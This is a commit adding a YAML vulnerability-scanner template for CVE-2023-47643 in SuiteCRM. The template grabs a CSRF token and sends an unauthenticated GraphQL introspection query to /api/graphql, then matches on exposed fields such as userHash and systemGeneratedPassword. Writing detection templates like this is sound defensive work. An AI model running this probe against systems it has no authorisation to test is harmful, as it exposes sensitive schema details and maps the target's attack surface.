Create CVE-2023-47643.yaml

2024-01-28 15:06:19 +09:00 · 2024-01-28 15:06:19 +09:00 · 3051711de1
parent e74af38f8d
commit 3051711de1
1 changed files with 58 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-47643.yaml
+++ b/http/cves/2023/CVE-2023-47643.yaml
@ -0,0 +1,58 @@
+id: CVE-2023-47643
+
+info:
+  name: Unauthenticated Graphql Introspection Enabled in SuiteCRM
+  author: isacaya
+  severity: medium
+  description: Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.
+  impact: |
+    An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash.
+  remediation: |
+    Update to version 8.4.2.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47643
+    - https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-47643
+    cwe-id: CWE-200
+    epss-score: 0.00063
+    cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:*
+  tags: cve,exposure,cve2023,disclosure,graphql
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /api/graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        X-XSRF-TOKEN: {{csrftoken}}
+
+        {"query":"query IntrospectionQuery {\r\n      __schema {\r\n        \r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          \r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      \r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n      \r\n      \r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }"}
+
+    extractors:
+      - type: regex
+        name: csrftoken
+        group: 1
+        internal: true
+        part: header
+        regex:
+          - "XSRF-TOKEN=([^;]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "userHash"
+          - "authenticateId"
+          - "systemGeneratedPassword"
+        part: body
+        condition: and